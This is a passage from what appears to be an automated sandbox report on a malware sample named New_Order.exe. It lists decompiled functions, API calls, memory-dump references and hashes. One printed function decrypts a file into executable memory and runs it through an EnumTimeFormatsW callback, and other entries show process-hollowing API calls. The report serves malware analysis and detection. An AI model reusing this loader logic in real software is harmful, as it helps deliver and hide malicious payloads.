                                                                        • LoadLibraryExA.KERNELBASE(?,00000000,00000008), ref: 004064F6
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.239947831.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.239942751.0000000000400000.00000002.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.239955178.0000000000408000.00000002.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.239960511.000000000040A000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.239967463.0000000000415000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.239979413.000000000042C000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.239985432.0000000000435000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.239991270.0000000000438000.00000002.00020000.sdmp Download File
                                                                        Similarity
                                                                        • API ID: DirectoryLibraryLoadSystemwsprintf
                                                                        • String ID: %s%s.dll$UXTHEME$\
                                                                        • API String ID: 2200240437-4240819195
                                                                        • Opcode ID: 265ca81b40b881dab18d3809a90e9c8d4eed5c2f9756e13f598d1e00e091b07b
                                                                        • Instruction ID: 03f82d29dddd483449b3488b7c2e1daaa1831c8d2f1a72e13e07ee25955ceb49
                                                                        • Opcode Fuzzy Hash: 265ca81b40b881dab18d3809a90e9c8d4eed5c2f9756e13f598d1e00e091b07b
                                                                        • Instruction Fuzzy Hash: DDF0213051020A6BDB55D764DD0DFFB375CEB08304F14017AA58AF11C1DA78D5398B6D
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 00405CBF, Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 33COMMON
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 100%
                                                                        			E00405CBF(char _a4, intOrPtr _a6, CHAR* _a8) {
				char _t11;
				signed int _t12;
				int _t15;
				signed int _t17;
				void* _t20;
				CHAR* _t21;

				_t21 = _a4;
				_t20 = 0x64;
				while(1) {
					_t11 =  *0x40a3d4; // 0x61736e
					_t20 = _t20 - 1;
					_a4 = _t11;
					_t12 = GetTickCount();
					_t17 = 0x1a;
					_a6 = _a6 + _t12 % _t17;
					_t15 = GetTempFileNameA(_a8,  &_a4, 0, _t21); // executed
					if(_t15 != 0) {
						break;
					}
					if(_t20 != 0) {
						continue;
					}
					 *_t21 =  *_t21 & 0x00000000;
					return _t15;
				}
				return _t21;
			}









                                                                        0x00405cc3
                                                                        0x00405cc9
                                                                        0x00405cca
                                                                        0x00405cca
                                                                        0x00405ccf
                                                                        0x00405cd0
                                                                        0x00405cd3
                                                                        0x00405cdd
                                                                        0x00405cea
                                                                        0x00405ced
                                                                        0x00405cf5
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00405cf9
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00405cfb
                                                                        0x00000000
                                                                        0x00405cfb
                                                                        0x00000000

                                                                        APIs
                                                                        • GetTickCount.KERNEL32 ref: 00405CD3
                                                                        • GetTempFileNameA.KERNELBASE(?,?,00000000,?,?,00000007,00000009,0000000B), ref: 00405CED
                                                                        Strings
                                                                        • "C:\Users\user\Desktop\New_Order.exe" , xrefs: 00405CBF
                                                                        • nsa, xrefs: 00405CCA
                                                                        • C:\Users\user\AppData\Local\Temp\, xrefs: 00405CC2
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.239947831.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.239942751.0000000000400000.00000002.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.239955178.0000000000408000.00000002.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.239960511.000000000040A000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.239967463.0000000000415000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.239979413.000000000042C000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.239985432.0000000000435000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.239991270.0000000000438000.00000002.00020000.sdmp Download File
                                                                        Similarity
                                                                        • API ID: CountFileNameTempTick
                                                                        • String ID: "C:\Users\user\Desktop\New_Order.exe" $C:\Users\user\AppData\Local\Temp\$nsa
                                                                        • API String ID: 1716503409-3552012503
                                                                        • Opcode ID: 3d6f8019ec5f34494dc3b68805de6783e4b5f3688fe49378b00e43b1512e0d50
                                                                        • Instruction ID: e7aa094648ebfea3bacdca9f43850832113df4cf88f6c4d01cd72ac7e01032f8
                                                                        • Opcode Fuzzy Hash: 3d6f8019ec5f34494dc3b68805de6783e4b5f3688fe49378b00e43b1512e0d50
                                                                        • Instruction Fuzzy Hash: 0AF08236308308ABEB108F56ED04B9B7BACDF91750F10C03BFA44EB290D6B499548758
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 024D0034, Relevance: 6.6, APIs: 4, Instructions: 637processthreadCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • CreateProcessW.KERNELBASE(?,00000000), ref: 024D0492
                                                                        • GetThreadContext.KERNELBASE(?,00010007), ref: 024D04B5
                                                                        • ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 024D04D9
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.240323672.00000000024D0000.00000040.00000001.sdmp, Offset: 024D0000, based on PE: false
                                                                        Similarity
                                                                        • API ID: Process$ContextCreateMemoryReadThread
                                                                        • String ID:
                                                                        • API String ID: 2411489757-0
                                                                        • Opcode ID: 2d8a7ba5af06e96742818b02aa258f7c2c6646f6b5f1bff6dbef97253908cfd2
                                                                        • Instruction ID: 71cab83771853035a58a9c645945f1bb3068ef0e6f75e79facca131dfd7c292b
                                                                        • Opcode Fuzzy Hash: 2d8a7ba5af06e96742818b02aa258f7c2c6646f6b5f1bff6dbef97253908cfd2
                                                                        • Instruction Fuzzy Hash: 0C422635E40258EEEB60CBA4DC65BFDB7B5AF08704F20549AE608FB2A0D7705A81DF15
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 10001120, Relevance: 6.2, APIs: 4, Instructions: 152filememorytimeCOMMON
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 79%
                                                                        			E10001120(void* __eflags) {
				signed int _v5;
				signed int _v12;
				intOrPtr _v16;
				void* _v20;
				long _v24;
				long _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				intOrPtr _v44;
				void* _v48;
				intOrPtr _v52;
				short _v572;
				int _t99;

				_v12 = 0;
				_v28 = 0;
				_v16 = E10001000();
				_v40 = E10001070(_v16, 0x8a111d91);
				_v32 = E10001070(_v16, 0xcbec1a0);
				_v36 = E10001070(_v16, 0xa4f84a9a);
				_v52 = E10001070(_v16, 0x433a3842);
				_v44 = E10001070(_v16, 0xa5f15738);
				_v32(0x103,  &_v572);
				_v36( &_v572, 0x10003000);
				_v48 = CreateFileW( &_v572, 0x80000000, 7, 0, 3, 0x80, 0);
				_v24 = 0x1c05;
				_v20 = VirtualAlloc(0, _v24, 0x3000, 0x40);
				ReadFile(_v48, _v20, _v24,  &_v28, 0);
				_v12 = 0;
				while(_v12 < _v28) {
					_v5 =  *((intOrPtr*)(_v20 + _v12));
					_v5 = (_v5 & 0x000000ff) + _v12;
					_v5 =  ~(_v5 & 0x000000ff);
					_v5 =  !(_v5 & 0x000000ff);
					_v5 = (_v5 & 0x000000ff) - _v12;
					_v5 =  !(_v5 & 0x000000ff);
					_v5 = _v5 & 0x000000ff ^ 0x00000096;
					_v5 =  ~(_v5 & 0x000000ff);
					_v5 = _v5 & 0x000000ff ^ _v12;
					_v5 = (_v5 & 0x000000ff) + 0xaa;
					_v5 = _v5 & 0x000000ff ^ _v12;
					_v5 = (_v5 & 0x000000ff) - _v12;
					_v5 = _v5 & 0x000000ff ^ _v12;
					_v5 = (_v5 & 0x000000ff) - 0xa6;
					_v5 =  ~(_v5 & 0x000000ff);
					_v5 = (_v5 & 0x000000ff) + 0xa9;
					_v5 =  ~(_v5 & 0x000000ff);
					_v5 = (_v5 & 0x000000ff) >> 0x00000003 | (_v5 & 0x000000ff) << 0x00000005;
					 *((char*)(_v20 + _v12)) = _v5;
					_v12 = _v12 + 1;
				}
				_t99 = EnumTimeFormatsW(_v20, 0, 0); // executed
				return _t99;
			}

















                                                                        0x10001129
                                                                        0x10001130
                                                                        0x1000113c
                                                                        0x10001150
                                                                        0x10001164
                                                                        0x10001178
                                                                        0x1000118c
                                                                        0x100011a0
                                                                        0x100011af
                                                                        0x100011be
                                                                        0x100011dd
                                                                        0x100011e0
                                                                        0x100011f7
                                                                        0x1000120c
                                                                        0x1000120f
                                                                        0x10001221
                                                                        0x10001235
                                                                        0x1000123f
                                                                        0x10001248
                                                                        0x10001251
                                                                        0x1000125b
                                                                        0x10001264
                                                                        0x10001271
                                                                        0x1000127a
                                                                        0x10001284
                                                                        0x10001291
                                                                        0x1000129b
                                                                        0x100012a5
                                                                        0x100012af
                                                                        0x100012bc
                                                                        0x100012c5
                                                                        0x100012d2
                                                                        0x100012db
                                                                        0x100012ee
                                                                        0x100012fa
                                                                        0x1000121e
                                                                        0x1000121e
                                                                        0x10001309
                                                                        0x10001312

                                                                        APIs
                                                                        • CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000), ref: 100011DA
                                                                        • VirtualAlloc.KERNELBASE(00000000,00001C05,00003000,00000040), ref: 100011F4
                                                                        • ReadFile.KERNELBASE(?,?,00001C05,00000000,00000000), ref: 1000120C
                                                                        • EnumTimeFormatsW.KERNELBASE(?,00000000,00000000), ref: 10001309
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.240764682.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                        • Associated: 00000000.00000002.240760281.0000000010000000.00000002.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.240769821.0000000010002000.00000002.00020000.sdmp Download File
                                                                        Similarity
                                                                        • API ID: File$AllocCreateEnumFormatsReadTimeVirtual
                                                                        • String ID:
                                                                        • API String ID: 2368423067-0
                                                                        • Opcode ID: 29ddb289108b214c17efc509523377428234a433c5d2ffc6af708bc04d2e98a6
                                                                        • Instruction ID: ed6b12713598fad1fe6b878bfadb2f890465dcae5655e68f9b2a8d97fb4e6241
                                                                        • Opcode Fuzzy Hash: 29ddb289108b214c17efc509523377428234a433c5d2ffc6af708bc04d2e98a6
                                                                        • Instruction Fuzzy Hash: 95514A74D4C398BEDF01CBE4C891BEDBFB4AF5A201F0881C9E590B6286D6365749CB61
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 0040209D, Relevance: 6.1, APIs: 4, Instructions: 73libraryloaderCOMMON
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 60%
                                                                        			E0040209D(void* __ebx, void* __eflags) {
				struct HINSTANCE__* _t18;
				struct HINSTANCE__* _t26;
				void* _t27;
				struct HINSTANCE__* _t30;
				CHAR* _t32;
				intOrPtr* _t33;
				void* _t34;

				_t27 = __ebx;
				asm("sbb eax, 0x42f4f8");
				 *(_t34 - 4) = 1;
				if(__eflags < 0) {
					_push(0xffffffe7);
					L15:
					E00401423();
					L16:
					 *0x42f4c8 =  *0x42f4c8 +  *(_t34 - 4);
					return 0;
				}
				_t32 = E00402BCE(0xfffffff0);
				 *(_t34 + 8) = E00402BCE(1);
				if( *((intOrPtr*)(_t34 - 0x18)) == __ebx) {
					L3:
					_t18 = LoadLibraryExA(_t32, _t27, 8); // executed
					_t30 = _t18;
					if(_t30 == _t27) {
						_push(0xfffffff6);
						goto L15;
					}
					L4:
					_t33 = GetProcAddress(_t30,  *(_t34 + 8));
					if(_t33 == _t27) {
						E0040521E(0xfffffff7,  *(_t34 + 8));
					} else {
						 *(_t34 - 4) = _t27;
						if( *((intOrPtr*)(_t34 - 0x20)) == _t27) {
							 *_t33( *((intOrPtr*)(_t34 - 8)), 0x400, 0x430000, 0x40b878, 0x40a000); // executed
						} else {
							E00401423( *((intOrPtr*)(_t34 - 0x20)));
							if( *_t33() != 0) {
								 *(_t34 - 4) = 1;
							}
						}
					}
					if( *((intOrPtr*)(_t34 - 0x1c)) == _t27 && E004038AA(_t30) != 0) {
						FreeLibrary(_t30);
					}
					goto L16;
				}
				_t26 = GetModuleHandleA(_t32); // executed
				_t30 = _t26;
				if(_t30 != __ebx) {
					goto L4;
				}
				goto L3;
			}










                                                                        0x0040209d
                                                                        0x0040209d
                                                                        0x004020a2
                                                                        0x004020a9
                                                                        0x00402164
                                                                        0x004022dd
                                                                        0x004022dd
                                                                        0x00402a5a
                                                                        0x00402a5d
                                                                        0x00402a69
                                                                        0x00402a69
                                                                        0x004020b8
                                                                        0x004020c2
                                                                        0x004020c5
                                                                        0x004020d4
                                                                        0x004020d8
                                                                        0x004020de
                                                                        0x004020e2
                                                                        0x0040215d
                                                                        0x00000000
                                                                        0x0040215d
                                                                        0x004020e4
                                                                        0x004020ed
                                                                        0x004020f1
                                                                        0x00402135
                                                                        0x004020f3
                                                                        0x004020f6
                                                                        0x004020f9
                                                                        0x00402129
                                                                        0x004020fb
                                                                        0x004020fe
                                                                        0x00402107
                                                                        0x00402109
                                                                        0x00402109
                                                                        0x00402107
                                                                        0x004020f9
                                                                        0x0040213d
                                                                        0x00402152
                                                                        0x00402152
                                                                        0x00000000
                                                                        0x0040213d
                                                                        0x004020c8
                                                                        0x004020ce
                                                                        0x004020d2
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000

                                                                        APIs
                                                                        • GetModuleHandleA.KERNELBASE(00000000,00000001,000000F0), ref: 004020C8
                                                                          • Part of subcall function 0040521E: lstrlenA.KERNEL32(0042A070,00000000,00422448,7519EA30,?,?,?,?,?,?,?,?,?,00403233,00000000,?), ref: 00405257
                                                                          • Part of subcall function 0040521E: lstrlenA.KERNEL32(00403233,0042A070,00000000,00422448,7519EA30,?,?,?,?,?,?,?,?,?,00403233,00000000), ref: 00405267
                                                                          • Part of subcall function 0040521E: lstrcatA.KERNEL32(0042A070,00403233,00403233,0042A070,00000000,00422448,7519EA30), ref: 0040527A
                                                                          • Part of subcall function 0040521E: SetWindowTextA.USER32(0042A070,0042A070), ref: 0040528C
                                                                          • Part of subcall function 0040521E: SendMessageA.USER32 ref: 004052B2
                                                                          • Part of subcall function 0040521E: SendMessageA.USER32 ref: 004052CC
                                                                          • Part of subcall function 0040521E: SendMessageA.USER32 ref: 004052DA
                                                                        • LoadLibraryExA.KERNELBASE(00000000,?,00000008,00000001,000000F0), ref: 004020D8
                                                                        • GetProcAddress.KERNEL32(00000000,?), ref: 004020E8
                                                                        • FreeLibrary.KERNEL32(00000000,00000000,000000F7,?,?,00000008,00000001,000000F0), ref: 00402152
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.239947831.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.239942751.0000000000400000.00000002.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.239955178.0000000000408000.00000002.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.239960511.000000000040A000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.239967463.0000000000415000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.239979413.000000000042C000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.239985432.0000000000435000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.239991270.0000000000438000.00000002.00020000.sdmp Download File
                                                                        Similarity
                                                                        • API ID: MessageSend$Librarylstrlen$AddressFreeHandleLoadModuleProcTextWindowlstrcat
                                                                        • String ID:
                                                                        • API String ID: 2987980305-0
                                                                        • Opcode ID: 7d01c9a26376e903ef8f956939bf13d5e0cf1485282589c35b64df24d5e4481f
                                                                        • Instruction ID: f7200b9d034bcb950a45a2beb12b39e5fe5f048be62c56950c98b25cd9e943c1
                                                                        • Opcode Fuzzy Hash: 7d01c9a26376e903ef8f956939bf13d5e0cf1485282589c35b64df24d5e4481f
                                                                        • Instruction Fuzzy Hash: 7A21C932600115EBCF207FA58F49A5F76B1AF14359F20423BF651B61D1CABC89829A5E
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 004015BB, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 66COMMON
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 87%
                                                                        			E004015BB(char __ebx, void* __eflags) {
				void* _t13;
				int _t19;
				char _t21;
				void* _t22;
				char _t23;
				signed char _t24;
				char _t26;
				CHAR* _t28;
				char* _t32;
				void* _t33;

				_t26 = __ebx;
				_t28 = E00402BCE(0xfffffff0);
				_t13 = E00405B28(_t28);
				_t30 = _t13;
				if(_t13 != __ebx) {
					do {
						_t32 = E00405ABA(_t30, 0x5c);
						_t21 =  *_t32;
						 *_t32 = _t26;
						 *((char*)(_t33 + 0xb)) = _t21;
						if(_t21 != _t26) {
							L5:
							_t22 = E00405761(_t28);
						} else {
							_t39 =  *((intOrPtr*)(_t33 - 0x20)) - _t26;
							if( *((intOrPtr*)(_t33 - 0x20)) == _t26 || E0040577E(_t39) == 0) {
								goto L5;
							} else {
								_t22 = E004056E4(_t28); // executed
							}
						}
						if(_t22 != _t26) {
							if(_t22 != 0xb7) {
								L9:
								 *((intOrPtr*)(_t33 - 4)) =  *((intOrPtr*)(_t33 - 4)) + 1;
							} else {
								_t24 = GetFileAttributesA(_t28); // executed
								if((_t24 & 0x00000010) == 0) {
									goto L9;
								}
							}
						}
						_t23 =  *((intOrPtr*)(_t33 + 0xb));
						 *_t32 = _t23;
						_t30 = _t32 + 1;
					} while (_t23 != _t26);
				}
				if( *((intOrPtr*)(_t33 - 0x24)) == _t26) {
					_push(0xfffffff5);
					E00401423();
				} else {
					E00401423(0xffffffe6);
					E004060F7("C:\\Users\\alfons\\AppData\\Local\\Temp", _t28);
					_t19 = SetCurrentDirectoryA(_t28); // executed
					if(_t19 == 0) {
						 *((intOrPtr*)(_t33 - 4)) =  *((intOrPtr*)(_t33 - 4)) + 1;
					}
				}
				 *0x42f4c8 =  *0x42f4c8 +  *((intOrPtr*)(_t33 - 4));
				return 0;
			}













                                                                        0x004015bb
                                                                        0x004015c2
                                                                        0x004015c5
                                                                        0x004015ca
                                                                        0x004015ce
                                                                        0x004015d0
                                                                        0x004015d8
                                                                        0x004015da
                                                                        0x004015dc
                                                                        0x004015e0
                                                                        0x004015e3
                                                                        0x004015fb
                                                                        0x004015fc
                                                                        0x004015e5
                                                                        0x004015e5
                                                                        0x004015e8
                                                                        0x00000000
                                                                        0x004015f3
                                                                        0x004015f4
                                                                        0x004015f4
                                                                        0x004015e8
                                                                        0x00401603
                                                                        0x0040160a
                                                                        0x00401617
                                                                        0x00401617
                                                                        0x0040160c
                                                                        0x0040160d
                                                                        0x00401615
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00401615
                                                                        0x0040160a
                                                                        0x0040161a
                                                                        0x0040161d
                                                                        0x0040161f
                                                                        0x00401620
                                                                        0x004015d0
                                                                        0x00401627
                                                                        0x00401652
                                                                        0x004022dd
                                                                        0x00401629
                                                                        0x0040162b
                                                                        0x00401636
                                                                        0x0040163c
                                                                        0x00401644
                                                                        0x0040164a
                                                                        0x0040164a
                                                                        0x00401644
                                                                        0x00402a5d
                                                                        0x00402a69

                                                                        APIs
                                                                          • Part of subcall function 00405B28: CharNextA.USER32(?,?,0042BC98,?,00405B94,0042BC98,0042BC98,7519FA90,?,C:\Users\user\AppData\Local\Temp\,004058DF,?,7519FA90,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405B36
                                                                          • Part of subcall function 00405B28: CharNextA.USER32(00000000), ref: 00405B3B
                                                                          • Part of subcall function 00405B28: CharNextA.USER32(00000000), ref: 00405B4F
                                                                        • GetFileAttributesA.KERNELBASE(00000000,00000000,00000000,0000005C,00000000,000000F0), ref: 0040160D
                                                                          • Part of subcall function 004056E4: CreateDirectoryA.KERNELBASE(?,?,C:\Users\user\AppData\Local\Temp\), ref: 00405727
                                                                        • SetCurrentDirectoryA.KERNELBASE(00000000,C:\Users\user\AppData\Local\Temp,00000000,00000000,000000F0), ref: 0040163C
                                                                        Strings
                                                                        • C:\Users\user\AppData\Local\Temp, xrefs: 00401631
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.239947831.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.239942751.0000000000400000.00000002.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.239955178.0000000000408000.00000002.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.239960511.000000000040A000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.239967463.0000000000415000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.239979413.000000000042C000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.239985432.0000000000435000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.239991270.0000000000438000.00000002.00020000.sdmp Download File
                                                                        Similarity
                                                                        • API ID: CharNext$Directory$AttributesCreateCurrentFile
                                                                        • String ID: C:\Users\user\AppData\Local\Temp
                                                                        • API String ID: 1892508949-1943935188
                                                                        • Opcode ID: f83e9c126ec5e5627e04690920b1fc6d95bfd0f8b27b2dc86f60bbb393f00223
                                                                        • Instruction ID: 2360f0c6ce39ff042ef5b5b007943225e6ab3dc636003d735fb75761c746189e
                                                                        • Opcode Fuzzy Hash: f83e9c126ec5e5627e04690920b1fc6d95bfd0f8b27b2dc86f60bbb393f00223
                                                                        • Instruction Fuzzy Hash: C1110431204141EBCB307FB55D419BF37B09A52725B284A7FE591B22E3DA3D4943AA2E
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 00401389, Relevance: 3.0, APIs: 2, Instructions: 43windowCOMMON
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 52%
                                                                        			E00401389(signed int _a4) {
				intOrPtr* _t6;
				void* _t8;
				void* _t10;
				signed int _t11;
				void* _t12;
				signed int _t16;
				signed int _t17;
				void* _t18;

				_t17 = _a4;
				while(_t17 >= 0) {
					_t6 = _t17 * 0x1c +  *0x42f470;
					if( *_t6 == 1) {
						break;
					}
					_push(_t6); // executed
					_t8 = E00401434(); // executed
					if(_t8 == 0x7fffffff) {
						return 0x7fffffff;
					}
					_t10 = E0040136D(_t8);
					if(_t10 != 0) {
						_t11 = _t10 - 1;
						_t16 = _t17;
						_t17 = _t11;
						_t12 = _t11 - _t16;
					} else {
						_t12 = _t10 + 1;
						_t17 = _t17 + 1;
					}
					if( *((intOrPtr*)(_t18 + 0xc)) != 0) {
						 *0x42ec0c =  *0x42ec0c + _t12;
						SendMessageA( *(_t18 + 0x18), 0x402, MulDiv( *0x42ec0c, 0x7530,  *0x42ebf4), 0);
					}
				}
				return 0;
			}











                                                                        0x0040138a
                                                                        0x004013fa
                                                                        0x0040139b
                                                                        0x004013a0
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x004013a2
                                                                        0x004013a3
                                                                        0x004013ad
                                                                        0x00000000
                                                                        0x00401404
                                                                        0x004013b0
                                                                        0x004013b7
                                                                        0x004013bd
                                                                        0x004013be
                                                                        0x004013c0
                                                                        0x004013c2
                                                                        0x004013b9
                                                                        0x004013b9
                                                                        0x004013ba
                                                                        0x004013ba
                                                                        0x004013c9
                                                                        0x004013cb
                                                                        0x004013f4
                                                                        0x004013f4
                                                                        0x004013c9
                                                                        0x00000000

                                                                        APIs
                                                                        • MulDiv.KERNEL32(00007530,00000000,00000000), ref: 004013E4
                                                                        • SendMessageA.USER32 ref: 004013F4
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.239947831.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.239942751.0000000000400000.00000002.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.239955178.0000000000408000.00000002.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.239960511.000000000040A000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.239967463.0000000000415000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.239979413.000000000042C000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.239985432.0000000000435000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.239991270.0000000000438000.00000002.00020000.sdmp Download File
                                                                        Similarity
                                                                        • API ID: MessageSend
                                                                        • String ID:
                                                                        • API String ID: 3850602802-0
                                                                        • Opcode ID: c8a7ffa28b32ff67f29a84afd2625c26bb9c758fd8177903822af55b1e7359ed
                                                                        • Instruction ID: 5c958b1953f7fe6cfac6f5d6f257cc34f78b067395a477e057d2c1298905e336
                                                                        • Opcode Fuzzy Hash: c8a7ffa28b32ff67f29a84afd2625c26bb9c758fd8177903822af55b1e7359ed
                                                                        • Instruction Fuzzy Hash: F801D1317242209BE7195B79DD08B6A3698E710718F50823AF851F61F1DA78DC129B4D
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 00406500, Relevance: 3.0, APIs: 2, Instructions: 22libraryloaderCOMMON
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 100%
                                                                        			E00406500(signed int _a4) {
				struct HINSTANCE__* _t5;
				signed int _t10;

				_t10 = _a4 << 3;
				_t8 =  *(_t10 + 0x40a240);
				_t5 = GetModuleHandleA( *(_t10 + 0x40a240));
				if(_t5 != 0) {
					L2:
					return GetProcAddress(_t5,  *(_t10 + 0x40a244));
				}
				_t5 = E00406492(_t8); // executed
				if(_t5 == 0) {
					return 0;
				}
				goto L2;
			}





                                                                        0x00406508
                                                                        0x0040650b
                                                                        0x00406512
                                                                        0x0040651a
                                                                        0x00406526
                                                                        0x00000000
                                                                        0x0040652d
                                                                        0x0040651d
                                                                        0x00406524
                                                                        0x00000000
                                                                        0x00406535
                                                                        0x00000000

                                                                        APIs
                                                                        • GetModuleHandleA.KERNEL32(?,?,?,004033BB,0000000B), ref: 00406512
                                                                        • GetProcAddress.KERNEL32(00000000,?), ref: 0040652D
                                                                          • Part of subcall function 00406492: GetSystemDirectoryA.KERNEL32 ref: 004064A9
                                                                          • Part of subcall function 00406492: wsprintfA.USER32 ref: 004064E2
                                                                          • Part of subcall function 00406492: LoadLibraryExA.KERNELBASE(?,00000000,00000008), ref: 004064F6
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.239947831.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.239942751.0000000000400000.00000002.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.239955178.0000000000408000.00000002.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.239960511.000000000040A000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.239967463.0000000000415000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.239979413.000000000042C000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.239985432.0000000000435000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.239991270.0000000000438000.00000002.00020000.sdmp Download File
                                                                        Similarity
                                                                        • API ID: AddressDirectoryHandleLibraryLoadModuleProcSystemwsprintf
                                                                        • String ID:
                                                                        • API String ID: 2547128583-0
                                                                        • Opcode ID: 86a36fe79f27c55ffb4f68e9eb19a7d4fc21bb30cdd0e1b9c8c3d4c34093b0ac
                                                                        • Instruction ID: acae0596759e2787f84b09bdc6f4b17f60683fab7501ae0ee02ebffea3798694
                                                                        • Opcode Fuzzy Hash: 86a36fe79f27c55ffb4f68e9eb19a7d4fc21bb30cdd0e1b9c8c3d4c34093b0ac
                                                                        • Instruction Fuzzy Hash: F7E08672A0421177D2105A74BE0893B72A8DE89740302043EF546F2144D7389C71966D
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 00405C90, Relevance: 3.0, APIs: 2, Instructions: 16fileCOMMON
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 68%
                                                                        			E00405C90(CHAR* _a4, long _a8, long _a12) {
				signed int _t5;
				void* _t6;

				_t5 = GetFileAttributesA(_a4); // executed
				asm("sbb ecx, ecx");
				_t6 = CreateFileA(_a4, _a8, 1, 0, _a12,  ~(_t5 + 1) & _t5, 0); // executed
				return _t6;
			}





                                                                        0x00405c94
                                                                        0x00405ca1
                                                                        0x00405cb6
                                                                        0x00405cbc

                                                                        APIs
                                                                        • GetFileAttributesA.KERNELBASE(00000003,00402EE1,C:\Users\user\Desktop\New_Order.exe,80000000,00000003), ref: 00405C94
                                                                        • CreateFileA.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00405CB6
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.239947831.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.239942751.0000000000400000.00000002.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.239955178.0000000000408000.00000002.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.239960511.000000000040A000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.239967463.0000000000415000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.239979413.000000000042C000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.239985432.0000000000435000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.239991270.0000000000438000.00000002.00020000.sdmp Download File
                                                                        Similarity
                                                                        • API ID: File$AttributesCreate
